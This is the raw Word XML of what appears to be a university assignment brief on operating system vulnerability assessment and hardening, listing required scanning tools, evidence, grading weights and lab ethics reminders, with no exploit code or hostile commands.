    <w:p w14:paraId="649C9E75" w14:textId="5448B9E9" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Configuration hardening measures specific to </w:t>
      </w:r>
      <w:r w:rsidR="007E6F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identified OS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6777C8B7" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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control implementation (ACLs, RBAC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795C08FE" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Windows-specific: AppLocker, UAC, BitLocker, firewall rules (ports 137-139, 445)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD1E36B" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Linux-specific: SELinux/AppArmor, SSH hardening, SUID restrictions, sudo configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410E767C" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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and logging setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E43B20" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Antivirus/anti-malware deployment for Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BD30C9" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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response procedures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D057A05" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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hardening and unnecessary service disabling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1626D3FB" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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system security considerations (NTFS ACLs, encryption)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9F0691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Lab Evidence (Appendix)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CBE654" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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of vulnerability discovery and scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365015CF" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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outputs (MBSA, WinPEAS, OpenVAS, chkrootkit, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39617241" w14:textId="699362E8" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Exploitation proof</w:t>
      </w:r>
      <w:r w:rsidR="007E6F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 of concept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were applicable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A68E919" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Hardening implementation screenshots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C35AD8" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Before/after security posture comparisons</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4280E67D" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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 files showing hardening measures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713253F5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Submission Requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D97BCEF" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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 formatting and structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51380712" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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 citation of sources and tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D742D1B" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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documentation of methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF35068" w14:textId="0321E258" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Actionable recommendations with </w:t>
      </w:r>
      <w:r w:rsidR="007E6F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 timeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D607954" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Inclusion of at least 3 different vulnerability scanning tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391B534C" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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of at least 5 distinct vulnerabilities discovered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685764E5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Grading Criteria</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC6A0AB" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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Completeness of vulnerability assessment (30%) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0ECD84" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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OS types or comprehensive single OS coverage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EEEB23" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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Identification of configuration vs. CVE vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BF81AC" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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Coverage of file system, access control, and authentication vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDE62CD" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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Technical accuracy and depth (25%) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1781189C" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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CVSS scoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E99CCBF" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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Accurate vulnerability descriptions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D509E70" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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 exploitation techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DB33D6" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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Quality of recommendations (20%) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C606A0A" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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Practicality and feasibility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D0DE8C" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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 remediation timelines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF65D54" w14:textId="7FF5929F" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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Reference to specific hardening </w:t>
      </w:r>
      <w:r w:rsidR="007E6F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 covered in </w:t>
      </w:r>
      <w:r w:rsidR="007E6F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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02672966" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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Professional presentation (15%) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AABE547" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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writing and organization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F87A99D" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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 formatting and citations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5282CE31" w14:textId="48974EB2" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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aids and screenshots were appropriate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2D05B0" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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Evidence of hands-on lab work (10%) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D40339C" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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outputs and screenshots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2308DF7C" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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Proof of exploitation/vulnerability verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26725C9C" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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Hardening verification evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5787DE" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="003015EA" w:rsidP="00AD0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015E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3C6650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5041629" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD0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Lab Safety and Compliance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D2D372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 Reminders:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B06B13B" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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Conduct all activities in </w:t>
      </w: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isolated lab environments only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC9DEBA" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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execute exploits on production systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D726B8C" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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Obtain </w:t>
      </w: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written authorization</w:t>
      </w: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testing any system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5994BBDD" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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all activities comprehensively</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F7FD9A" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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responsible disclosure if testing non-lab systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C8E17F" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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Respect data privacy and confidentiality</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7FBC33" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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findings through proper channels</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0163BC22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Ethical Obligations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A352264" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD0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08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future security professionals, understanding these vulnerabilities enables you to protect systems, not compromise them. Use this knowledge responsibly and legally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1855CE78" w14:textId="1ED5A3D7" w:rsidR="00676A80" w:rsidRDefault="003015EA"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015E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4FB23A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D84B06F" w14:textId="65111A07" w:rsidR="007E6FEB" w:rsidRPr="007E6FEB" w:rsidRDefault="007E6FEB" w:rsidP="007E6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E6F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End!</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="007E6FEB" w:rsidRPr="007E6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055"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6962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A3460"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0BB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63361"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="88EC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371D5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B792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C5541"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D73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53815"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="70DA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66ABC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F24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86561"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="009C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72D86"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3560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414C4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9B6E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D0D0A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B8D4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42F69"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F40A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C125A6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="28B0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17C91"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="17B6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014EA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00D0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30EA2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3C78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9755E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CC54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B39C3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="562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77A41"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EB5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B3CC7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D73A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A2FBB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A5C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7471B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="55147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6E6319"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FD6C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A856AB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4400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9265AB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1C1E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07A90"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6148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1A671C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E534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C31BFB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="490A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C9770C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D874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E19B3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3820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12640"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5B2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1558B6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F51C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6C5FFC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="11F4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0142F1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B53C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0A0645"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8264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BD5CFB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="954E7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6D21DE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DF0EB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D43AF4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A47A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D94EBF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="816E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0A602F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="803E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8C3854"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5520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B61503"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="729E9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481337"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A0EC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BB552A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0AA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E30F71"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3E3CF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C026F5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="99CC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98249C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="65A6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3565B7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FAA8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732B94"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ED92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446E9F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3F4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713E2D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E8EE7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0D1793"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4F48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B37FB8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="04C2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6E792C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E086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FC2F40"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CCC8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613695">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="922449869">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1755857633">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1311670183">
    <w:abstractNumId w:val="44"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="765854999">
    <w:abstractNumId w:val="49"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="2046176617">
    <w:abstractNumId w:val="47"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1895700910">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1274751029">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="656765396">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="531266160">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="445272118">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1927687562">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1731927850">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1705669372">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="2060780799">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1854538157">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="518088661">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="185336139">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1918173787">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1832059320">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="415056056">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="782309589">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1022367336">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="96945837">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="1852337033">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="1759909643">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="1035812948">
    <w:abstractNumId w:val="51"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="1954246254">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="1331177762">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="390152609">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="580454819">
    <w:abstractNumId w:val="54"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="885801917">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="436564370">
    <w:abstractNumId w:val="52"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="655257367">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="1035813442">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="418017663">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="37" w16cid:durableId="1671132526">
    <w:abstractNumId w:val="48"/>
  </w:num>
  <w:num w:numId="38" w16cid:durableId="1524324513">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="39" w16cid:durableId="1193569862">
    <w:abstractNumId w:val="46"/>
  </w:num>
  <w:num w:numId="40" w16cid:durableId="326135619">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="41" w16cid:durableId="1345668670">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="42" w16cid:durableId="1493643890">
    <w:abstractNumId w:val="50"/>
  </w:num>
  <w:num w:numId="43" w16cid:durableId="1298293765">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="44" w16cid:durableId="1146312156">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="45" w16cid:durableId="634068459">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="46" w16cid:durableId="1972590414">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="47" w16cid:durableId="856775186">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="48" w16cid:durableId="678236041">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="49" w16cid:durableId="333191144">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="50" w16cid:durableId="711997277">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="51" w16cid:durableId="1128351716">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="52" w16cid:durableId="1644507575">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="53" w16cid:durableId="1468620548">
    <w:abstractNumId w:val="45"/>
  </w:num>
  <w:num w:numId="54" w16cid:durableId="1254704311">
    <w:abstractNumId w:val="53"/>
  </w:num>
  <w:num w:numId="55" w16cid:durableId="111675189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A69"/>
    <w:rsid w:val="000D7993"/>
    <w:rsid w:val="002F5AD6"/>
    <w:rsid w:val="003015EA"/>
    <w:rsid w:val="00422D84"/>
    <w:rsid w:val="00464FFD"/>
    <w:rsid w:val="0056217A"/>
    <w:rsid w:val="00577F29"/>
    <w:rsid w:val="00676A80"/>
    <w:rsid w:val="006C3215"/>
    <w:rsid w:val="007655D5"/>
    <w:rsid w:val="007E1B53"/>
    <w:rsid w:val="007E6FEB"/>
    <w:rsid w:val="00875F46"/>
    <w:rsid w:val="009A3E44"/>
    <w:rsid w:val="009D6A69"/>
    <w:rsid w:val="00AD082D"/>
    <w:rsid w:val="00C764E9"/>
    <w:rsid w:val="00E5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09181"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{BE027143-6036-7348-8CEB-E5099849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6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6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6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A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6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D6A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6A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6A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6A6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2410</Words>
  <Characters>13738</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>114</Lines>
  <Paragraphs>32</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>16116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Hafiz Adnan</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Hussain Hafiz Adnan</cp:lastModifiedBy>
  <cp:revision>13</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-12-21T11:07:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-21T16:37:00Z</dcterms:modified>
</cp:coreProperties>
</file>